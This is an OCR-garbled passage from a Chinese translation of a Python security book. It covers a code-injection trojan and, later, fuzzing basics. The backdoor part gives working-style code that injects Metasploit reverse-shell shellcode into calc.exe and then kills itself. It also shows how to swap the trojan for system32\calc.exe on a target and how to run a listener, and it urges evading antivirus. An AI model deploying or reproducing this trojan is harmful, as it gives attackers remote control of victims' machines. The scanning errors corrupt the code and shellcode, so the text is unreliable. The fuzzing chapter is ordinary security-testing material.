门 ， 后 门 程序 通过 重 定向 代码 ， 和 启动 真正 的 计算 器 。 用 户 会 看 不 到 任何 那 悉 的 未 
西 ， 依 旧 正 常 的 使 用 计算 器 。 下 面 的 脚本 引 用 了 第 三 章 的 
my_debugger_defines.py， 其 中 包含 了 创建 进程 所 需要 的 结构 和 常量 。 


#backdoor .py 
# This library is from Chapter 3 and contains all 
# the necessary defines for process creation 
import sys 
from ctypes import * 
from my_debugger_defines import * 
kernel32 = windll.kernel32 
PAGE EXECUTE READWRITE = 0x00000040 
PROCESS ALL ACCESS = ( Ox000F0000 | 0x00100000 | OxFFF ) 
VIRTUAL MEM = ( 0x1000 | 0x2000 ) 
# This is the original executable 
path to exe = "C:\\calc.exe" 
startupinfo - STARTUPINFO() 
process information - PROCESS INFORMATION() 
creation flags - CREATE NEW CONSOLE 
startupinfo.dwFlags = 0x1 
startupinfo.wShowWindow = 0x0 
startupinfo.cb = sizeof(startupinfo) 
# First things first, fire up that second process 
# and store its PID so that we can do our injection 
kernel32.CreateProcessA(path_to_exe, 

None, None, None, None, 

creation_flags, None, 

None, byref(startupinfo), 

byref(process information)) 
pid = process information.dwProcessId 


HRS, IUE. BRRLENBEANK SIENA. BiNEAR 
数 能 够 处 理 代码 注入 和 DLL 注入 两 种 情况 parameter 标志 设置 为 1，data 变量 
包含 DLL 路 径 ， 就 能 进行 DLL 注入 ， 默 认 情 况 下 parameter 设置 成 0， 就 是 代码 
注入 。 跟 黑 的 在 后 面 。 


Zbackdoor.py 


def inject( pid, data, parameter = 0 ): 

# Get a handle to the process we are injecting into. 

h process - kernel32.0penProcess( PROCESS ALL ACCESS, False, ir 

if not h process: 
print "[*] Couldn't acquire a handle to PID: %s" % pid 
sys.exit(0) 

arg address = kernel32.VirtualAllocEx(h process, 0, len(data), 

written - c int(0) 

kernel32.WriteProcessMemory(h process, arg address, data, len( 

thread id = c ulong(0) 

if not parameter: 
start address - arg address 

else: 
h kernel32 = kernel32.GetModuleHandleA("kernel32.dll") 
start address = kernel32.GetProcAddress(h kernel32, 'LoadLil 
parameter - arg address 

if not kernel32.CreateRemoteThread(h process,None, O,start addi 
print "[*] Failed to inject the DLL. Exiting." 
sys.exit(0) 

return True 





现在 我 们 有 了 能 够 支持 两 种 注入 的 代码 。 是 时 候 闻 两 段 不 同 的 shellcode 注入 真正 
的 cacl.exe 进程 了 ， 一 个 shellcode 反弹 shell 给 我 们 ， 另 一 个 杀 死 后 门 进程 。 


#backdoor.py 


# Now we have to climb out of the process we are in 

# and code inject our new process to kill ourselves 

#/* win32_reverse - EXITFUNC=thread LHOST=192.168.244.1 LPORT=4444 

4Size-287 Encoder=None http://metasploit.com */ 

connect back shellcode - 
"NAxfcNx6eaNxebNx4dNxe8Nxf ONxf f NxffNxffNX60NX8bNX6CNX24NX24NX8b Vo 
"NXSCNX8bNX7CNX05Nx78Nx01Nxef NX8bNxAf NX18NX8bNx5f NX20Nx01Nxeb WV 
"NX8bNX34Nx8bNx01NxeeNx31NXCONX99NXxac NX84NXCONX74NX07NXC1NXca WV 
"\xO1\xc2\xeb\xf4\x3b\x54\xX24\xX28\xX75\xe5\x8D\X5F\X24\x01\xeb\) 
"\x8b\xOc\x4b\x8b\x5F\x1c\x01\xeb\xO3\x2c\x8b\x89\x6C\x24\x1c\> 
"\xXC3\X31\xdb\x64\x8b\x43\x30\x8b\x40\xO0c\x8b\x70\x1ic\xad\x8b\> 
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xFF\xd6\x66\x53\x66\x68\x33\) 
"\X68\X77\X73\X32\xX5F\xX54\xXF F\xdO\x68\xcb\xed\xfo\x3b\x50\xfF\) 
"\xX5F\x89\xe5\x66\x81\xed\xO08\x02\x55\x6a\xO2\xFF\xdO\x68\xd9\> 
"Nxf5NxadNx5b7NXf F\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xFfF\xd0\) 
"NXCONXa8NXf ANXO1NX66NX68NX11NX5CNX66NX53NX89Nxe1NX95NXx68Nxec V 
"\xaa\x60\x57\xfF\xd6\x6a\x1LO\x51\x55\ xf f NxdONx66Nx6aNx64NX66 V» 
"\xX63\x6d\x6a\x50\x59\xX29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xcO\> 
"\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\> 
"NX68NX72NXf eNxXb3NX16NXf f NX75NXx28Nxf f Nxd6Nx5bNx57NX52NX5b1NX51VP 
"NX6aNX01Nx51NXx51NXx55Nx5b1Nxf f NxdONx68NxadNxd9Nx05NxceNx53Nxf f o 
"NX6aNXTfTNXTÉTNXS7NXf f NxdONx68Nxe7NX79NXC6NX79NXTTNX75NXOANXff o 
"\XFI\X77\XFo\xf F\xd0\x68\xef\xce\xeO\x60\x53\xFF\xd6\xFF\xd0" 

inject( pid, connect_back_shellcode ) 

#/* win32_exec - EXITFUNC=thread CMD=cmd.exe /c taskkill /PID AAAA 

4Size-159 Encoder=None http://metasploit.com */ 

our pid = str( kernel32.GetCurrentProcessId() ) 

process killer shellcode = \ 
"NXfCNXe8NXx44NX090NX00NX90NX8bNXx45NX3CNX8DNX7CNX05BNX78Nx0d1Nxef Vo 
"\X4F\x18\x8b\x5F\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xcO\> 
"\xac\x84\xcO\x74\x07\xc1\xca\xOd\xO01\xc2\xeb\xf4\x3b\x54\x24\) 
"\x75\xe5\x8b\x5F\xX24\x01\xeb\x66\x8b\xO0C\x4b\x8b\x5F\x1c\x01\> 
"\x8b\x1ic\x8b\x01\xeb\x89\x5C\x24\xO4\xc3\x31\xcO\x64\x8b\x40\) 
"\xX85\xcO\x78\x0C\x8b\x40\xOc\x8b\x70\x1c\xad\x8b\x68\x08\xeb\> 
"NX8bNX80NXbONXxGONXOONXOONX8bNX68NX3CNX5fT NX31NXf 6NX60NX56NX89VP 
"\xX83\xcO\x7b\x50\x68\xef\xce\xeO\x60\x68\x98\xfe\x8a\x0e\x57\) 
"NXe7NX63NX6dNX64NX2eNX65NX78NX65NX20NX2f NX63NX20NX74NX61NX73WV) 
"NX6bNX69NX6CNX6CNX20NX2fT NXBONXA9NXA4NX20NXA1NXA1NXA1NX41NX00" 

padding - 4 - ( len( our pid ) ) 

replace value = our pid + ( "Nx00" * padding ) 

replace string- "Nx41" * 4 

process killer shellcode = process killer shellcode.replace( replac 

# Pop the process killing shellcode in 

inject( our pid, process killer shellcode ) 





All right! 后 门 程序 通 计算 器 (系统 的 cacl.exe 有 按钮 和 数字 在 上 面 ) 的 PID， 将 
shellcode 注入 到 进程 里 ， 然 后 通过 第 二 个 shellcode 自我 了 断 。 这 个 后 门 综合 了 很 
多 不 同 的 技术 。 每 次 重要 目标 系统 中 有 人 运行 了 计算 器 (当然 你 能 够 改 成 别 的 服务 


级 别 的 文件 ， 随 系统 和 启动) ， 我 们 就 能 够 取得 机 器 的 控制 权 。 接 下 来 就 是 键 瘟 记 
录 ， 嗅 探 数 据 包 ， 任 何 你 想 干 的 ， 都 去 干 吧 山 但 是 在 这 我 们 还 跤 忽 了 一 点 ， 不 是 每 
台 机 器 都 安装 了 Python， 他 们 为 什么 不 用 Linux E? 如 果 这 样 估计 我 也 不 用 翻译 这 
ABT, UE ! 别 担心 ， 我 们 有 py2exe， 它 能 把 py 文件 转 换 成 exe 文件 。 


7.2.3 py2exe 


py2exe 是 一 个 非常 方便 的 Python 库 ， 能 够 料 Python 脚本 编译 成 完全 独立 的 
Windows 执行 程序 。 记 得 在 下 面 的 操作 都 是 基于 Windows 平台 ，Linux FEAE 
Python。py2exe 安 装 完成 后 ， 你 就 能 够 在 脚本 中 使 用 他 们 了 。 在 这 之 前 先 看 看 调 
用 它们 。 


#setup.py 

# Backdoor builder 

from distutils.core import setup 

import py2exe 

setup ( 
console-['backdoor.py'], 
options = {'py2exe':{'bundle files':1}}, 
Zipfile = None, 


很 好 很 简单 。 仔 细 看 看 我 们 传人 setup 的 函数 。 第 一 个 ，console 是 我 们 要 编译 的 
Python 脚本 。 options 和 zipfile 参数 设置 为 需要 打包 的 Python DLL 和 所 有 别 的 依 
MAJE. RFR 们 的 后 门 就 能 在 任何 没有 安装 python 的 windlws 系统 上 使 用 了 。 
确保 my. debugger. defines.py, backdoor.py, 和 setup.py 文件 在 相同 的 目录 下 。 在 
命令 行 下 输入 以 下 命令 ， 编 译 脚 本 。 


python setup.py py2exe 


在 编译 完成 后 ， 在 目录 下 会 看 到 多 出 两 个 目录 ，dist build, f£ dist 文件 夹 下 可 以 
找到 backdoor.exe。 重 命名 为 calc.exe 拷贝 到 目标 系统 ， 并 将 目标 系统 的 calc.exe 
从 C:\WINDOWS\system32\ 拷贝 到 别 的 目录 (比如 C folder)。 将 我 们 的 calc.exe 
复制 到 C:\WINDOWS\system32\ 目录 下 。 现 在 我 们 还 需要 一 个 简单 的 shell 接 

口 ， 用 来 和 反弹 回来 的 shell 交互 ， 发 送 命令 ， 接 收 结果 。 


Zbackdoor shell.py 

import socket 

import sys 

host - "192.168.244.1" 

port = 4444 

server - socket.socket( socket.AF INET, socket.SOCK STREAM ) 
server.bind( ( host, port ) ) 

server.listen( 5 ) 

print "[*] Server bound to %s:%d" % ( host , port ) 
Zbackdoor shell.py 

import socket 

import sys 

host - "192.168.244.1" 

port = 4444 

server - socket.socket( socket.AF INET, socket.SOCK STREAM ) 
server.bind( ( host, port ) ) 

server.listen( 5 ) 

print "[*] Server bound to %s:%d" % ( host , port ) 


这 是 一 个 非常 就 当 的 socket 服务 器 ， 仅 仅 是 接受 一 个 连接 ， 然 后 处 理 一 些 基础 的 
iEI 作 。 你 可 以 修改 host 和 port 为 自己 需要 的 参数 (比如 53， 80) 。 先 运行 
服务 器 进行 端口 监听 ， 然 后 在 远程 的 系统 (本 机 也 行 ) 上 运行 cacl.exe。 你 会 看 到 漳 
出 了 计算 器 的 窗口 ， 同 时 你 的 Python shell 服务 器 也 会 接收 到 一 个 连接 ， 开 始 读 取 
数据 。 为 了 打 断 recv 循环 ， 请 按 下 CTRL-C 键 ， 然 后 程序 提示 你 输入 命令 。 这 时 
候 就 能 做 很 多 事情 了 ， 比 如 使 用 Windows shell KERS, HEA dir, cd, 

type。 每 个 命令 的 输出 结果 都 能 够 传输 回来 。 现 在 你 拥有 了 一 个 高 效 的 后 门 。 用 你 
的 想象 力 扩展 它 ， 让 它 更 猥琐 ， 让 它 能 逃 过 更 多 的 杀毒 的 软件 ， 更 隐 珊 。 我 们 的 目 
标 就 是 没有 最 坏 ， 只 有 更 坏 。 用 Python 的 好 外 就是， 快速 ， 简 单 ， 可 重用 。 


当 你 看 完 这 章 ， 你 已 经 学 会 了 DLL 和 代码 注入 这 两 种 非常 有 用 的 技术 。 在 今后 的 渗 
E 测试 或 者 逆向 工程 中 ， 你 会 发 现 花 在 这 些 技 能 上 的 精力 是 值得 的 。 接 下 来 我 们 会 
变 得 更 黑 ， 我 们 要 开始 学 习 如 何 破坏 程序 。 用 Python, FB Python-based fuzzer, 
用 所 有 伟大 的 开源 工具 。 


8 FUZZING 


Fuzzing 一 直 以 来 都 是 个 热点 话题 ， 因 为 使 用 它 能 非常 高 效 的 寻找 出 软件 的 漏洞 。 
简单 的 说 ，Fuzzing 就 是 向 目标 程序 发 SES Ust ee BS FC BUR AH 误 这 一 
章 ， 让 我 们 先 了 解 几 个 不 同类 型 的 fuzzer 还 有 bug， 之 后 我 们 还 要 自己 动手 写实 
现 一 个 file fuzzer。 下 一 章 ， 会 详细 的 介绍 Sulley fuzzing 框架 和 如 何 设计 一 个 针 
对 Windows 了 驱动 的 fuzzer。 


fuzzers 基本 上 分 成 2 大 类 : generation (产生 ) 和 mutation (RF) 。 
Generation fuzzers 创建 数据 ， 然 后 发 送 到 到 目标 程序 ， mutation fuzzers 并 不 创 
建 数据 ， 而 是 截获 程序 接收 的 数据 ， 然 后 修改 数据 。 举 个 例子 ， 当 我 们 要 fuzz 一 
个 web 服务 器 的 时 候 ，generation fuzzer 会 生成 一 套 变 形 的 Http 请 求 然后 发 送 给 
web 服务 器 ， 而 mutation fuzzer 会 捕获 Http 请 求 ， 在 请 求 传 递 给 web 服务 器 前 
修改 它们 。 


为 了 将 来 我 们 创建 创建 一 个 高 效 的 fuzzer， 我 们 需要 先 对 不 同类 型 的 bug 做 一 个 简 
单 的 了解， 并 且 看 看 fuzzer 如 何 触发 它们 。 如 果 要 更 详细 的 了 解 软 件 安全 检测 ， 
可 以 看 下 面 的 书 。 


8.1 Bug 的 分 类 


当 hacker 或 者 逆向 工程 症 分 析 软 件 漏洞 的 时 候 ， 都 会 设法 找到 能 控制 程序 执行 的 

bug. Fuzzer 就 提供 了 一 种 自动 化 的 方式 帮助 我 们 找 出 bug， 然 后 获得 系统 的 控制 
权 ， 提 升 权 限 ， 并 且 偷 取 程 序 访 问 的 信息 ， 不 论 目 标 程序 是 在 系统 独立 运行 的 进 

程 ， 还 是 只 运行 脚本 的 网 络 程序 。 在 这 里 我 们 关注 的 是 独立 运行 的 进程 ， 以 及 其 泄 
漏 的 信息 。 


8.1.1 m X HH 


缓冲 区 浴 出 是 最 常见 的 软件 漏洞 。 所 有 的 正常 的 内 存 管理 函数 ， 字 符 义理 代码 其 至 
编程 语言 本 身 都 可 能 产生 缓冲 区 洽 出 漏洞 ， 致 使 软件 出 错 。 


简 而 言 之 ， 缓 冲 区 浴 出 就 是 由 于 ， 把 个 过 多 的 数据 存储 在 一 个 过 小 的 内 存 空 间 里 ， 
所 引发 的 软件 错误 。 对 于 其 原理 的 可 以 用 个 很 形象 的 比喻 来 说 明 。 如 果 一 个 水 桶 ， 
只 能 装 一 加 仓 的 水 ， 我 们 只 导入 几 滴 水 或 者 半 加 仓 的 水 ， 甚 至 是 一 加 仓 ， 把 水 桶 填 
满 了 ， 都 不 会 出 问题 ， 一 切 都 正常 如 初 。 如 果 我 们 导 和 人 两 加 仓 的 水 ， 那 水 就 会 浴 出 
到 地 板 上 ， 到 时 候 ， 你 就 得 收拾 这 堆 烂 捧 子 了 。 用 在 软件 上 也 是 一 样 的 ， 如 果 太 多 
的 水 (数据 ) ， 倒 入 到 一 个 桶 (buffer) A, 水 就 会 浴 出 到 作为 的 地 表 

(memory) 上 。 当 一 个 攻击 者 能 够 控制 多 余 的 数据 对 内 存 区 域 的 im, BURG] 
得 到 代码 的 执行 权限 ， 进 一 步 获取 到 系统 信息 或 者 做 别 的 事 。 有 两 种 主要 的 缓冲 区 
an: 基于 栈 的 和 基于 堆 的 。 两 种 洽 出 的 表现 不 同 ， 但 产生 的 结果 相同 : 攻击 者 最 
终 控制 代码 的 执行 。 


栈 渝 出 的 特点 就 是 通过 浴 出 覆盖 栈 ， 来 控制 程序 的 执行 流程 : 比如 改变 函数 的 指 
针 ， 变 量 的 值 ， 异 常 处 理 程序 ， 或 者 覆盖 隙 数 的 返回 地 址 ， 可 以 得 到 代码 的 执行 权 
限 。 栈 渝 出 的 时 候 ， 会 抛 出 一 个 访问 违例 ; 这 样 我 们 就 能 够 在 fuzzing 的 时 候 非 常 
方便 的 跟踪 到 它们 。 


应 用 程序 在 运行 的 时 候 会 动态 的 申请 一 块 内 存 区 域 ， 这 些 区 域 就 是 堆 。 堆 是 一 块 一 
块 连 在 一 起 的 ， 负 责 存储 元 数据 。 当 攻击 者 将 数据 覆盖 到 自己 申请 的 堆 以 外 的 别 的 
HEM at IR, SE 渝 出 就 发 生 了 。 接 着 攻击 者 能 通过 覆盖 数据 改变 任何 存储 在 堆 上 的 数 
据 : 53, WAH, 安全 今 牌 ， 以 及 各 种 重要 的 数据 。 堆 浴 出 很 难 被 立即 的 跟踪 
到 ， 因 为 被 影响 的 内 存 快 ， 一 般 不 会 被 程序 立即 的 访问 ， 需 要 等 到 程序 结束 之 前 的 
RN AAP ABR MEI, SALAD 能 一 直 不 访问 。 在 fuzzing 的 时 候 我 们 就 
必须 一 直 等 到 一 个 访问 违例 产生 了 才 会 知道 ， 这 个 HAMEED. 
MICROSOFT GLOBAL FLAGS 

这 项 技术 是 专门 为 软件 开发 者 (or exploit writer) 专 门 设计 的 。Gflags(Global flags 全 
局 标 志 ) 是 一 系列 的 诊断 和 调试 设置 ， 能 够 让 你 非常 精确 的 跟踪 ， 记录 ， 和 调试 软 
fF. f£ 2000, xp 和 2003 上 都 能 够 使 用 这 项 技术 。 

这 项 技术 最 有 趣 的 地 方 在 于 堆 页 面 的 校对 。 当 我 们 在 一 个 进程 上 打开 这 个 选项 的 时 
候 ， 校 对 器 会 动态 的 更 重 内 存 的 操作 ， 包 括 内 存 的 申请 和 释放 。 不 过 真正 令 人 高 兴 
的 特点 是 ， 它 能 够 在 堆 浴 出 发 生 的 时 候 立 刻 产生 一 个 调试 中 断 ， 这 样 调试 器 就 会 停 


在 产生 错误 的 指 伟 上 。 RHE PMMA RIBS T EAKA bug 的 时 候 我 们 就 能 
方便 的 查找 到 源头 在 哪 。 


我 们 能 够 使 用 gflags.exe 来 编辑 Gflags 标 志 帮 助 我 们 跟踪 堆 瀹 出 。 
http://www.microsoft.com/downloads/details.aspx?Familyld249AE8576-9BB9- 
4126-9761-BA80 这 个 软件 是 Microsoft "免费 "提供 的 ， 请 "放心 "安装 。 


Immunity 也 提供 了 一 个 Gflags 库 ， 并 且 将 它 和 PyCommand 结合 在 了 一 起 。 更 多 
的 信 息 访 问 http://debugger.immunityinc.com/. 


为 了 通过 fuzzing 澄 出 目标 程序 ， 我 们 会 简单 的 传递 给 程序 大 量 的 数据 ， 然 后 跟 踩 
程序 ， 找 出 利用 了 我 们 传 入 数据 的 代码 ， 然 后 祈祷 它 没有 合格 验证 数据 长 度 的 ,my 
god! 


接 下 来 看 看 另 一 个 常见 的 应 用 程序 漏洞 ，Integer Overflows $3. 


8.1.2 Integer Overflows 


整数 浴 出 是 一 种 非常 有 趣 的 漏洞 ， 包 括 程序 如 何 义理 (编译 器 标准 的 ) 有 符号 整数 
和 exploit 如 何 利用 这 个 整数 。 一 个 有 符号 整数 ， 由 2 个 字 节 组 成 ， 表 示 的 范围 从 
-32767 到 32767。 当 我 们 从 党 试 向 存储 一 个 整数 的 地 方 写 人 超过 其 大 小 的 数字 的 
时 候 ， 整 数 浴 出 就 触发 了 。 因 为 存 如 的 数字 太 大 ， 义 理 器 会 自动 的 将 高 位 多 出 来 的 
FAAR, JAER, FRE 什么 值得 利用 的 。 下 面 让 我 们 看 一 个 设计 好 的 例子 : 


MOV EAX, [ESP + 0x8] 
LEA EDI, [EAX + 0x24] 
PUSH EDI 

CALL msvcrt.malloc 


第 一 条 指令 将 栈 内 的 数据 [esp+0x8] 传 给 EAX， 第 二 条 指令 ， 将 EAX 加 上 0x24 xx 
个 地 址 存储 在 EDI 中 。 之 后 我 们 将 这 个 唯一 的 参数 (申请 的 内 存 的 大 小 ) 传 入 函数 
malloc。 一 切 看 起 来 都 很 正常 ， 真 的 是 这 样 吗 ?假设 在 栈 中 的 数据 是 一 个 有 符号 整 
数 ， 而 且 非 常 大 ， 几 乎 接 近 了 有 符号 整数 的 最 大 值 (32767) ， 然 后 传递 给 
EAX, EAX 加 上 0x24, 整 数 浴 出 ， 最 后 我 们 得 到 一 个 非常 小 的 值 。 看 一 看 表 8-1, 
看 看 这 一 切 是 如 何 发 生 的 ， 假 定 在 堆 上 的 参数 是 我 们 能 够 控制 的 ， 我 们 给 它 设置 成 
一 个 非常 大 的 值 OxFFFFFFF5, 


Stack Parameter => OxFFFFFFF5 

Arithmetic Operation => OxFFFFFFF5 + 0x24 

Arithmetic Result => 0x100000019 (larger than 32 bits) 
Processor Truncates => 0x00000019 


Listing 8-1: 在 控制 下 的 整数 操作 

如 何 一 切 顺 利 ，malloc 将 只 申请 0x19 个 字 节 大 小 的 空间 ， 这 块 内 存 比 程序 本 身 要 
申请 的 空间 小 很 多 。 如 果 程 序 将 一 大 块 的 数据 写 入 这 块 区 域 ， 缓 冲 区 浴 出 就 发 生 
了 。 在 fuzzing 的 时 候 ， 我 们 得 从 整形 最 大 值 和 最 小 值 两 个 方面 入手 ， 测 试 执行 兴 


出 ， 接 下 来 就 是 设法 进 一 步 控制 浴 出 ， 使 浴 出 变 得 更 完美 。 


下 面 让 我 们 快速 的 看 一 看 另 一 种 常见 漏洞 ， 格 式 化 字符 串 漏洞 Format String 
Attacks。 


8.1.3 Format String Attacks 


格式 化 字符 串 攻 击 ， 顾 名 思 义 ， 攻 击 者 通过 将 设计 好 的 字符 串 传 人 特定 字符 串 格 式 
{ERs 数 ， 使 其 产生 浴 出 ， 列 如 C 语言 的 printf。 让 我 们 先 看 看 printf 的 原型 : 


int printf( const char * format, ... ); 


第 一 个 参数 是 一 个 完整 需要 被 格式 化 的 字符 串 ， 我 们 可 以 附加 额外 的 参数 ， 表 示 数 
据 将 以 什么 形式 被 输出 。 举 个 例子 : 


int test = 10000; 

printf("We have written %d lines of code so far.", test); 
Output: 

We have written 10000 lines of code so far. 


%d 是 一 个 模式 说 明 符 ,格式 指定 符 指定 了 特定 的 输出 格式 (变量 test 以 数字 的 形式 
输 出 )。 如 果 一 个 程序 员 不 小 心 睡 着 了 On 严重 的 压榨 ) ， 写 出 了 下 面 的 代码 : 


char* test = "%x"; 
printf(test); 
Output: 5a88c3188 


这 看 起 来 和 上 面 的 很 不 同 。 我 们 传递 了 一 个 模式 说 明 符 给 printf HA, ERA 
递 需 要 打印 的 变量 。printf 会 分 析 我 们 传递 给 它 的 参数 ， 并 且 假 设 栈 中 的 下 一 个 参 
数 就 是 需要 打 印 的 参数 ， 但 是 其 实 这 个 是 毫 无 效果 的 一 个 数据 。 在 这 个 例子 中 是 
0x5a88c3188， 也 许 是 存 在 栈 上 的 数据 ， 也 有 可 能 跟 是 一 个 指向 内 存 的 指针 。 有 两 
个 指示 符 很 有 趣 ， 一 个 是 %s， 另 一 个 是 %n。 %s 指示 符 告 诉 宇 符 串 函数 ， 把 内 
存 当 作 字 符 串 来 扫描 ， 直 到 遇 到 一 个 NULL 字符 ， 代 表 字 符 串 结束 了 。 这 对 于 读 取 
一 大 块 连续 的 数据 或 者 读 取 特 定 地 址 的 数据 都 十 分 有 用 ， 当 然 你 也 可 以 用 它 来 
crash 程序 。%n 指示 符 (惟一 一 个 ) 允许 向 内 存 写 和 人 内存， 而 不 仅仅 是 格式 化 字 
符 串 。 这 就 允许 ， 攻 击 者 履 盖 男 数 的 返回 地 址 ， 或 者 改写 一 个 以 存在 的 函数 指针 ， 
以 获得 代码 的 执行 权限 。 在 fuzzing 的 似乎 后 ， 我 们 只 要 在 测试 用 例 中 加 入 这 些 特 
定 格式 说 明 符 ， 然 后 传递 给 一 个 被 错误 使 用 了 的 字符 串 人 处理 芳 数 。 


现在 我 们 已 经 对 不 同 的 bug 类 型 有 了 个 个 大 概 的 了 解 ， 是 时 候 开 始 创造 第 一 个 
fuzzer 了 。 接 下 来 我 们 会 简单 的 实现 一 个 file fuzzer， 它 先 将 正常 的 文件 变形 之 后 
拿 去 给 程序 处 理 。 这 次 继续 使 用 我 们 久违 的 老 朋 友 PyDbg。Come on!!! 


8.2 File Fuzzer 


File format vulnerabilitie 文件 格式 化 漏洞 已 经 渐渐 的 成 为 了 客户 端 攻 击 的 流行 方 
式 ， 而 我们 最 感 兴 趣 的 就 是 找 出 文件 格式 化 分 析 时 出 现 的 漏洞 。 无 论 面 对 的 目标 是 
杀毒 软件 还 是 文 档 阅 读 器 ， 我 们 都 希望 测试 库 尽 可 能 的 全 ， 最 好 是 包含 说 有 的 文件 
格式 。 同 时 还 要 确保 ， 我 们 的 fuzzer 能 准确 的 捕捉 到 崩溃 信息 ， 然 后 自动 化 的 决 
策 出 是 否 是 可 利用 的 漏洞 。 最 后 还 要 加 入 emailing 的 功能 ， 在 我 们 有 成 千 上 万 的 
测试 案例 的 时 候 ， 你 不 会 想 傻 傻 的 做 在 机 器 前 看 数据 流 吧 ! 


现在 开始 写 代 码 ， 第 一 步 ， 构 造 创 建 一 个 类 框架 ， 用 于 简单 的 文件 选择 。 


#file_ fuzzer.py 

from pydbg import * 

from pydbg.defines 

import * import utils 

import random 

import sys 

import struct 

import threading 

import os 

import shutil 

import time 

import getopt 

class file fuzzer: 

def init (self, exe path, ext, notify): 

self.exe path - exe path 
self.ext - ext 
self.notify crash - notify 
self.orig file - None 
self.mutated file - None 
self.iteration = 0 
self.exe path = exe path 
self.orig file - None 
self.mutated file - None 
self.iteration = 0 
self.crash = None 
self.send notify - False 
self.pid - None 
self.in accessv handler - False 
self.dbg - None 
self.running - False 
self.ready - False 


# Optional 

self.smtpserver - 'mail.nostarch.com' 
self.recipients = ['jms@bughunter.ca', ] 
self.sender = 'jms@bughunter.ca' 


self.test_cases = [ "%s%n%s%n%s%n", "\xff", "\x00", "A" ] 
def file_picker( self ): 

file list = os.listdir("examples/") 

list_length = len(file_list) 

file = file list[random.randint(O, list length-1)] shutil.« 

return file 


| m Em 


类 框架 定义 了 一 些 全 局 变量 ， 用 于 跟踪 记录 文件 的 基础 信息 ， 这 些 文件 将 会 在 变形 
后 加 和 人 测试 例 。file_picker 函数 使 用 内 建 的 Python 函数 列 出 目录 内 的 所 有 文件 ， 
然后 随机 选取 一 个 进行 变形 。 


接 下 来 我 们 要 做 一 些 线程 方面 的 工作 : 加 载 目标 程序 ， 跟 踪 崩 溃 信 息 ， 在 文档 分 析 
完成 之 后 终止 目标 程序 。 第 一 步 ， 将 目标 程序 加 载 进 一 个 调试 线程 ， 并 且 安 装 自 定 
义 的 访问 违例 处 理 代码 。 第 二 步 ， 创 建 第 二 个 线程 ， 用 于 监视 调试 的 线程 ， 并 且 负 
责 在 一 段 长 度 的 时 间 之 后 杀 死 调试 线程 。 最 后 还 得 附加 一 段 email 提醒 的 代码 。 





Hfile fuzzer.py 


def fuzz( self ): 
while 1: 
if not self.running: £(1) 
4 We first snag a file for mutation 
self.test file - self.file picker() 
self.mutate file() 
# Start up the debugger thread 
pydbg thread = threading.Thread(target-self.start debut 
pydbg thread.setDaemon(0) 
pydbg thread.start() 
while self.pid -- None: 
time.sleep(1) 
# Start up the monitoring thread 
monitor thread - threading.Thread (target-self.monitor. 
monitor thread.setDaemon(60) 
monitor thread.start() 
else: 
self.iteration += 1 
time.sleep(1) 
# Our primary debugger thread that the application 
# runs under 
def start debugger(self): 
print "[*] Starting debugger for iteration: %d" % self.iteratic 
self.running - True 
self.dbg - pydbg() 
self.dbg.set callback(EXCEPTION ACCESS VIOLATION, self.check ac: 
pid = self.dbg.load(self.exe path, "test.%s" % self.ext) 
self.pid - self.dbg.pid 
self.dbg.run() 
# Our access violation handler that traps the crash 
# information and stores it 
def check accessv(self,dbg): 
if dbg.dbg.u.Exception.dwFirstChance: 
return DBG CONTINUE 
print "[*] Woot! Handling an access violation!" 
self.in accessv handler - True 
crash bin - utils.crash binning.crash binning() 
crash bin.record crash(dbg) 
self.crash - crash bin.crash synopsis() 
# Write out the crash informations 
crash fd = open("crashes\\crash-%d" % self.iteration, "w") 
crash_fd.write(self.crash) 
# Now back up the files 
shutil.copy("test.%s" % self.ext,'"Crashes\\%d.%s" % (self.iter: 
shutil.copy("examples\\%s" % self.test_file, "crashes\\%d_orig.? 
self.dbg.terminate process() self.in accessv handler = False 
self.running - False 
return DBG EXCEPTION NOT HANDLED 
# This is our monitoring function that allows the application 
# to run for a few seconds and then it terminates it 


def monitor debugger(self): 
counter = 0 
print "[*] Monitor thread for pid: %d waiting." % self.pid, 
while counter « 3: 
time.sleep(1) 
print counter, 
counter += 1 
if self.in accessv handler !- True: 
time.sleep(1) 
self.dbg.terminate process() 
self.pid - None 
self.running - False 
else: 
print "[*] The access violation handler is doing its busine 
while self.running: 
time.sleep(1) 
# Our emailing routine to ship out crash information 
def notify(self): 
crash message = "From:%s\r\n\r\nTo:\r\n\r\nIteration: 96dNnNnOut 
session - smtplib.SMTP(smtpserver) 
session.sendmail(sender, recipients, crash message) 
session.quit() 
return 


ES — —H 


我 们 已 经 有 了 个 比较 完整 的 流程 ， 能 够 顺利 的 完成 fuzz 了 ， 让 我 们 简单 的 看 看 各 个 
Eg 数 的 作用 。 第 一 步 ， 通 过 self.running 确保 当前 只 有 一 个 调试 线程 在 执行 或 者 访 
问 违例 的 处 理 程序 没有 在 搜集 月 渍 数据。 第 二 步 ， 我 们 把 随即 选择 到 文件 ， 传 入 变 
形 函 数 ， 这 个 函数 会 在 稍 后 实现 。 


一 旦 文件 变形 完成 ， 第 三 步 ， 我 们 就 创建 一 个 调试 线程 ， 启 动 目标 程序 ， 并 将 上 面 
随即 选中 的 文件 的 路 径 名 字 ， 作 为 命令 行 参数 传人 。 接 着 一 个 条 件 循 环 ， 等 待 目标 
进程 的 创建 。 当 程 序 创 建成 功 的 时 候 ， 得 到 新 的 PID， 第 四 步 ， 创 建 一 个 监视 进 

程 ， 确 保 在 一 段 事件 以 后 杀 死 调试 的 程序 。 监 视线 程 创建 成 功 以 后 ， 我 们 就 增加 统 
计 标 志 ， 然 后 加 入 主 循环 ， 等 待 一 次 fuzz 的 完成 ， 继 续 下 一 次 fuzz。 现 在 让 我 们 
增加 一 个 简单 的 变形 函数 。 





Hfile fuzzer.py 


def mutate file( self ): 
# Pull the contents of the file into a buffer 
fd = open("test.%s" 96 self.ext, "rb") 
stream = fd.read() 
fd.close() 
# The fuzzing meat and potatoes, really simple 
4 Take a random test case and apply it to a random position 
X in the file 
test case = self.test cases[random.randint(0,len(self.test cas: 
stream length = len(stream) 
rand offset = random.randint(0, stream length - 1 ) 
rand len = random.randint(1, 1000) 
4 Now take the test case and repeat it 
test case - test case * rand len 
# Apply it to the buffer, we are just 
# splicing in our fuzz data 
fuzz file = stream[0:rand offset] 
fuzz file += str(test case) 
